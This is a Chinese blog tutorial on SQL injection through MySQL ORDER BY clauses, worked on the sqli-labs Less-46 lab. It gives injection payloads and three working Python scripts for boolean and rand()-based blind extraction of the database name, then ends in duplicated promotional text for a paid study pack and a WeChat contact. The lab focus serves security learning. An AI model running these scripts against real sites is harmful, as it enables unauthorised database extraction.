一.ORDER BY子句的用法
在MySQL中支持使用ORDER BY语句对查询结果集进行排序处理。使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下:
select \* from 表名 order by 列名(或者数字) asc;升序(默认升序)
select \* from 表名 order by 列名(或者数字) desc;降序
order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。
二.ORDER BY注入方式
这里使用sqllabs的第46关,展示如下注入方式
1.利用order by子句快速猜解表中的列数配合union进行联合查询
使用union进行联合查询要保证前面和后面的查询列数一致所以,在用union之前,要判断列数是多少,payload很简单就是order by后面跟上数字就好,那么就可以通过group by二分法测试具体步骤步骤如下:
- 尝试一个较大的数字(例如,10)作为
GROUP BY的参数,观察页面的响应。 - 如果报错,表示选择的列数过多,需要减小数字。
- 通过逐步减小数字,直到不再报错为止。
- 确定的数字即为正确的列数。
2.基于布尔的盲注(数字型)
只有order=$id,数字型注入时才能生效,如果是order ='$id'我们输入的语句被转化为字符串,功能失效演示如下:
如上可以看出字符串型时if(***)被转化为字符串导致失效,排列顺序不改变而数字型时排列顺序改变
知道列名的情况
根据列名构造payload如下:
order by if(ascii(substr((select database()),1,1))>110,id,password)
分析一下,首先(select database())获取当前数据库的名称,然后使用substr()提取第一个字符接着ascii()将这个字符转为ASCII值然后判断ASCII值是否大于110,true时根据id排序,false时根据username排序,这样我们就把这个字母的信息获取到了,下面使用python编写脚本:
import requests
from bs4 import BeautifulSoup
def Boolean\_injection(url):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if(ascii(substr((select database()),%d,1))>%d,id,password)" % (i, mid)
params = {"sort": payload}
# 获取HTML文档
html_doc = requests.get(url, params=params).text
# 创建BeautifulSoup对象
soup = BeautifulSoup(html_doc, 'html.parser')
# 找到所有行(<tr>)元素
rows = soup.find_all('tr')
# 遍历每一行,并提取每个单元格的文本内容
cell_contents = []
for row in rows:
cells = row.find_all('td')
cell_texts = [cell.text for cell in cells]
cell_contents.append(cell_texts)
# 清除第一个元素
del cell_contents[0]
# 获取id列
id_cell = []
for row in cell_contents:
id_cell.append(row[0])
if id_cell == sorted(id_cell):
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
if __name__ == "\_\_main\_\_":
url = 'http://127.0.0.1:8080/Less-46/'# 换成你自己的网址
Boolean_injection(url)
不知道列名的情况
虽然我们不知道列名但是id总应该有吧那么不妨这样构造payload:
order by if (ascii(substr((select database()),1,1))>110,1,(select id from information_schema.tables))
这样当ASCII值是否大于110为true时就会正常返回界面,false时会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,如果没有回显错误信息页面也没有关系,因为内容为空也可以作为一个布尔条件,python脚本如下:
import requests
from bs4 import BeautifulSoup
def Boolean\_injection(url):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "if (ascii(substr((select database()),%d,1))>%d,1,(select id from information\_schema.tables))" % (i, mid)
params = {"sort": payload}
# 获取HTML文档
html_doc = requests.get(url, params=params).text
if 'Subquery returns more than 1 row' in html_doc:
# low = mid + 1
high = mid
else:
low = mid + 1
# high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
if __name__ == "\_\_main\_\_":
url = 'http://127.0.0.1:8080/Less-46/'# 换成你自己的网址
Boolean_injection(url)
采用rand()函数盲注
rand() 函数用于生成介于0和1之间的伪随机数。当你提供一个种子作为参数给 rand() 函数时,它会使用这个种子来初始化伪随机数生成器,并且对于相同的种子,将会生成相同的随机数序列,那么我就可以构造这样的payload:
order by rand(ascii(substr((select database()),1,1))>110)
同样的当ascii(substr((select database()),1,1))>110为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。python脚本如下:
import requests
from bs4 import BeautifulSoup
def Boolean\_injection(url):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "rand(ascii(substr((select database()),%d,1))>%d)" % (i, mid)
params = {"sort": payload}
# 获取HTML文档
html_doc = requests.get(url, params=params).text
# 创建BeautifulSoup对象
soup = BeautifulSoup(html_doc, 'html.parser')
# 找到所有行(<tr>)元素
rows = soup.find_all('tr')
# 遍历每一行,并提取每个单元格的文本内容
cell_contents = []
for row in rows:
cells = row.find_all('td')
cell_texts = [cell.text for cell in cells]
cell_contents.append(cell_texts)
# 清除第一个元素
del cell_contents[0]
# 获取id列
id_cell = []
for row in cell_contents:
id_cell.append(row[0])
if id_cell == ['5', '4', '3', '8', '1', '7', '2', '6']:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
### 学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
#### 网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份**我自己整理的网络安全入门工具以及使用教程和实战。**
#### 项目实战
最后就是项目实战,这里带来的是**SRC资料&HW资料**,毕竟实战是检验真理的唯一标准嘛~
#### 面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
mg-blog.csdnimg.cn/img_convert/35fc46df24091ce3c9a5032a9919b755.jpeg)
#### 面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-X8s9BAAf-1712861709677)]
337
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
